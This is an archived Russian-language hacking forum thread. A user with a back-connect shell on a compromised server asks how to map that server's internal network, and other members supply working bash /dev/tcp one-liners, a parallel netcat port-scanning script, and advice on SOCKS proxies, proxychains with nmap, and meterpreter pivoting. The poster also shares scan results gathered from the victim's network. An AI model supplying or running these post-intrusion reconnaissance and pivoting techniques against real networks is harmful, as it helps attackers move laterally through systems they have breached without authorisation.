PDA

Просмотр полной версии : Сканирование локальной сети уязвимого хоста


aeeee
20.09.2013, 23:02
Вопрос следущий - есть шелл с бекконектом с уязвимого хоста.
Возможно ли поднять сокс на этом хосте, потом одеть его на какой-нибудь из своих серверов и просканить локальную сеть этого хоста просто юзая сокс?
Например адреса 192.168.1.1-100 под одетым соксом.

chupakabra
20.09.2013, 23:19
Если вы имеет ввиду сканер портов типа nmap, то не получится

aeeee
20.09.2013, 23:20
А тот же metasploit к примеру? Если в параметре прокси указывать поднятный сокс на хосте.

12309
20.09.2013, 23:42
у сервера на сетевых интерфейсах только локальные адреса (192.188.*.*) или есть еще один интерфейс с доступным из интернета белым IP?
возможно, хватит socks-сервера, но также возможно, что придётся поднимать vpn и/или настраивать маршрутизацию (на что может не хватить прав).

aeeee
20.09.2013, 23:44
Да прав на впн точно не хватит, ку 12309)) Это всё тот сервер 32битный под который semtex компилил :)

FIXER
21.09.2013, 00:55
Можно поставить VPSProxy и через его прокси сканить локалку.

vp$
21.09.2013, 11:41
а что мешает собрать нмап на уязвимой машине и просканить локалку

aeeee
21.09.2013, 17:00
Мешают права нободи и отсутствие возможности запустить тот же gcc (pemission denied)

b3
21.09.2013, 17:11
На форуме есть пример на bash в одну строку как просканировать сеть

xCedz
21.09.2013, 23:21
for i in $(seq 1 100); do exec 3<>/dev/tcp/192.168.1.$i/80 && echo -en 'HEAD / HTTP/1.0\r\n\r\n' >&3 && cat <&3 && exec 3>&-; done


/dev/tcp/HOST/PORT


можно шустрее пустить, пример с netcat (фишко с xargs):




#!/bin/bash
set -e

RunThread () {
xargs --max-procs=50 -n 2 sh -c 'nc -w 3 -v -z $1 $2 2>&1 | grep "open"' sh
}

PrintRangeIP () {
for b in $(seq $tr $pr); do
for c in $(seq 1 255); do
echo $cl"."$b"."$c $pt
done
done
}

cl=$(echo $1 | cut -f1 -d"-" | cut -f1,2 -d".")
tr=$(echo $1 | cut -f1 -d"-" | cut -f3 -d".")
pr=$(echo $1 | cut -f2 -d"-")
pt=$2

PrintRangeIP | RunThread




./scan 192.168.1-2 22

upd: в некоторых версиях nc нужно грепать по succeeded

aeeee
22.09.2013, 04:36
for i in $(seq 1 100); do exec 3<>/dev/tcp/192.168.1.$i/80 && echo -en 'HEAD / HTTP/1.0\r\n\r\n' >&3 && cat <&3 && exec 3>&-; done


/dev/tcp/HOST/PORT


Этот вариант очень помог, спасибо большое!)

aeeee
22.09.2013, 04:55
Проблемка:

1.sh: line 2: /dev/tcp/192.168.0.106/80: No route to host
HTTP/1.1 200 OK
Server: nginx/1.0.8
Date: Sun, 22 Sep 2013 00:37:36 GMT
Content-Type: text/html; charset=ISO-8859-1
Connection: close
X-Powered-By: PHP/5.3.8
Set-Cookie: bblastvisit=1379810254; expires=Mon, 22-Sep-2014 00:37:34 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Mon, 22-Sep-2014 00:37:34 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7

Как решить проблему с No route to host? Тк не могу законектится никуда почему-то, когда сканирую определенный порт другой.
Странно что No route to host, когда я получаю ответы от мускла и от веб-сервера.

xCedz
22.09.2013, 13:28
Проблемка:

1.sh: line 2: /dev/tcp/192.168.0.106/80: No route to host
....
Как решить проблему с No route to host? Тк не могу законектится никуда почему-то, когда сканирую определенный порт другой.
Странно что No route to host, когда я получаю ответы от мускла и от веб-сервера.
по мотивам http://www.catonmat.net/c/40338:
проверка открытоcти порта.
p=80; for b in {1..100};do ((bash -c "(>/dev/tcp/192.168.1.$b/$p)" 2> /dev/null && echo "192.168.1."$b "open "$p)&read -t0.1;kill $! 2>/dev/null)2>/dev/null;done;
(работает довольно шустро)

как вариант:

http://www.catonmat.net/blog/tcp-port-scanner-in-bash/

Еще можно использовать мощь python или perl на выбор, да хоть php. у profexer'a в шелле вроде был сканер портов (P.A.S shell смотри в релизах тут же) :)

Beched
22.09.2013, 18:13
Если веб-сервер, то ставишь это:
http://forum.antichat.ru/threadnav177147-1-10.html

Затем ставишь proxychains и спокойно работаешь через сокс (сканишь нмапом) без изврата с башем.

(Если фаера нет, то вообще тупо поднимаешь сокс на чём угодно, в чём проблема?)

3t3st3r
14.10.2013, 22:18
если есть возможность запустить meterpreter, то смотрите в сторону pivoting и portforward. в armitage или coboltstrike вообще есть возможность создания виртуального интерфейса аля vpn